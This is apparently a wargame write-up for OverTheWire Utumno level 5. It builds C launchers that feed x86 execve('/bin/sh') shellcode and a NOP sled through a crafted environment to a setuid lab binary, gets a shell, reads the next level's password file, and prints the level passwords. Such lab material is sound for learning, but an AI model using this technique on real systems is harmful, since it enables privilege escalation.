# Utumno wargame: Level 5


# ssh utumno5@utumno.labs.overthewire.org
utumno5@utumno.labs.overthewire.org's password:776f756361656a69656b

utumno5@melissa$ file /utumno/utumno5
/utumno/utumno5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno5@melissa$ mkdir /tmp/u5
utumno5@melissa$ cd !$
utumno5@melissa$ cat execve2.c
#include <unistd.h>
/*
 * Dry-run harness: runs the address-printing helper (/tmp/u5/getenvaddr)
 * under the same 11-entry environment that is later handed to the target,
 * so the reported location of EGG can be measured first.
 * The four-byte values \xa1\xa2\xa3\xa4 and \xb1\xb2\xb3\xb4 are placeholders;
 * the later listing on this page replaces them with real addresses.
 */
int main(){
        char *args[4];
        char *env[12];
        /* argv for the helper: its own path, the variable to look up, the target's path */
        args[0]="/tmp/u5/getenvaddr";
        args[1]="EGG";
        args[2]="/utumno/utumno5";
        /* NOTE(review): this is the string "NULL", not a null pointer, so args[]
         * holds no terminator; execve() will keep reading past the array. */
        args[3]="NULL";
        /* nine empty strings pad the environment so the next entry is envp[9] */
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        /* sixteen 0x90 bytes followed by a 4-byte placeholder */
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xa1\xa2\xa3\xa4";
        /* EGG = 4-byte placeholder followed by machine code (contains the bytes of "/bin" and "//sh") */
        env[10]="EGG=\xb1\xb2\xb3\xb4\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        /* NOTE(review): the return value is not checked and main() has no return
         * statement; if execve() fails the program ends silently. */
        execve("/tmp/u5/getenvaddr",args,env);
}
utumno5@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

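/*
 * Print the address at which the environment variable named by argv[1]
 * is expected to be found when the program named by argv[2] is started
 * with the same environment.
 *
 * Usage: getenvaddr <envvar> <target-path>
 * Returns 0 on success, 1 when an argument is missing or the variable is unset.
 */
int main(int argc,char *argv[]){
        char *ptr;

        /* argv[1] and argv[2] are both dereferenced below, so require them */
        if(argc<3){
                fprintf(stderr,"usage: %s <envvar> <target-path>\n",argc>0?argv[0]:"getenvaddr");
                return 1;
        }

        /* getenv() returns NULL for an unset variable; do not do arithmetic on it */
        ptr=getenv(argv[1]);
        if(ptr==NULL){
                fprintf(stderr,"%s is not set in the environment\n",argv[1]);
                return 1;
        }

        /*
         * Shift by the length difference between this program's name and the
         * target's. Per the author's note, the difference is not doubled (*2)
         * because the name appears only in argv and not in an environment variable.
         * NOTE(review): the subtraction is done in size_t, so a target name longer
         * than argv[0] relies on unsigned wrap-around.
         */
        ptr+=(strlen(argv[0])-strlen(argv[2]));

        /* %p expects a void pointer */
        printf("%s will be at %p\n",argv[1],(void *)ptr);
        return 0;
}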
utumno5@melissa$ gcc -m32 -o execve2 execve2.c && gcc -m32 -o getenvaddr getenvaddr.c
utumno5@melissa$ ./execve2
EGG will be at 0xffffdfc9
utumno5@melissa$ gdb -q
(gdb) #>address+shellcode
(gdb) print /x 0xffffdfc9 - 0x4
$1 = 0xffffdfc5
(gdb) #>EGG=address+shellcode
(gdb) print /x 0xffffdfc9 + 0x4
$2 = 0xffffdfcd
(gdb) #>shellcode
utumno5@melissa$ cat execve.c
#include <unistd.h>

/*
 * Final launcher: starts /utumno/utumno5 with a NULL argv and a hand-built
 * 11-entry environment. The two embedded addresses are the values computed
 * in the gdb session shown on this page (0xffffdfc5 and 0xffffdfcd), stored
 * little-endian.
 *
 * Defensive reading: with argv == NULL the target starts with argc == 0.
 * A program that indexes argv without checking argc first can end up reading
 * the environment pointers that follow it. Presumably that is the flaw in the
 * target here, but its source is not shown on this page.
 * Checking argc before any argv access closes that path. Newer Linux kernels
 * also insert an empty argv[0] when argv is empty. The hard-coded stack
 * addresses additionally assume a stack layout that is identical across runs
 * and, presumably, an executable stack.
 */
int main(){
        char *env[12];
        /* nine empty strings pad the environment so the next entry is envp[9] */
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        /* sixteen 0x90 bytes followed by 0xffffdfc5 (reported EGG address minus 4) */
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc5\xdf\xff\xff";
        /* EGG = 0xffffdfcd (reported EGG address plus 4) followed by the same machine code as in the dry run */
        env[10]="EGG=\xcd\xdf\xff\xff\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        /* NOTE(review): return value unchecked and no return statement in main() */
        execve("/utumno/utumno5",NULL,env);
}
utumno5@melissa$ gcc -m32 -o execve execve.c
utumno5@melissa$ ./execve
Here we go - Åßÿÿ
$ /usr/bin/whoami
utumno6
$ /bin/cat /etc/utumno_pass/utumno6
65696c75717569657468
